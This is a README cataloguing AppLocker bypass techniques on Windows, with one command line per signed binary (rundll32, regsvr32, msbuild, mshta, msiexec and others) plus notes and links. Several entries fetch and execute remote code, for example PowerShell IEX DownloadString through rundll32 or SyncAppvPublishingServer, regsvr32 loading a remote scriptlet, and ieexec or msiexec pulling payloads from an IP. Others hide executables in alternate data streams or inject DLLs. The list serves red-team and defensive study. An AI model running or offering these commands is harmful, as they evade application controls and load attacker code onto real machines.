The goal of this repository is to document the most common techniques to bypass AppLocker. This README file contains a complete list of all known bypasses. Since AppLocker can be configured in different ways it makes sense to have master list of bypasses. This README.MD will be the master and will be updated with known and possible AppLocker bypasses.
I have created a list of verified bypasses that works against the default rules created with AppLocker.
For details on how I verified and how to create the default rules you can check my blog: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
VerifiedBypasses-DefaultRules.MD
Please contribute and do point out errors or resources I have forgotten.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
rundll32 shell32.dll,Control_RunDLL payload.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.
- Links:
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.
- Links:
msbuild.exe pshell.xml
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
- http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
- https://github.com/Cn33liz/MSBuildShell
- https://github.com/Cn33liz/MS17-012
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- https://www.youtube.com/watch?v=aSDEAPXaz28
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
regsvcs.exe /U regsvcs.dll
regsvcs.exe regsvcs.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
regasm.exe /U regsvcs.dll
regasm.exe regsvcs.dll
- Requires admin: /U does not require admin
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
bginfo.exe bginfo.bgi /popup /nolicprompt
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: No
Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.
- Links:
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://github.com/subTee/AllTheThings
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Open .diagcab package
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
mshta.exe evilfile.hta
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
cmd.exe /k < script.txt
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
Get-Content script.txt | iex
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
cscript.exe //E:vbscript script.txt
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
Missing Example
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
Missing Example
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
ieexec.exe http://x.x.x.x:8080/bypass.exe
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
cdb.exe -cf x64_calc.wds -o notepad.exe
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
dnx.exe consoleapp
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
rcsi.exe bypass.csx
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
Missing example
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
Control.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
msxsl.exe customers.xml script.xsl
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
Can also execute scriptlets -
https://twitter.com/NickTyrer/status/958450014111633408
https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- Links:
xwizard.exe argument1 argument2
DLL loading in same folder xwizard.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
fsi.exe c:\folder\d.fscript
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
odbcconf -f file.rsp
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
te.exe bypass.wsc
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF
- Links:
The following folders are by default writable and executable by normal users
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
- Requires admin: No
- Windows binary: N/A
- Bypasses AppLocker Default rules: ?
Notes: This list is based on Windows 10 1709. Run accesschk to verify on other Windows versions
ATBroker.exe /start malware
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
wmic process call create calc
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
slmgr.vbs
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires registry keys for com object.
- Links:
winrm quickconfig
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires registry keys for com object.
- Links:
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
InfDefaultInstall.exe shady.inf
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Only works on Windows 7? Windows 10 requires admin or digital signature
- Links:
winword.exe /l dllfile.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: No commonly made DLL example file
runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: Part of Visual studio. Requires TrackerUI.dll present in 1028 subfolder.
script.wsf
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: .WSF files are supposed to not be blocked by AppLocker
- Links:
Powershell -version 2
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Bypasses Constrained language mode
- Links:
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
SyncInvoke <executable> [args]
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present
Notes: Requires PowerShell version 2
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires write access to a place that is allowed by AppLocker
- Links:
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes: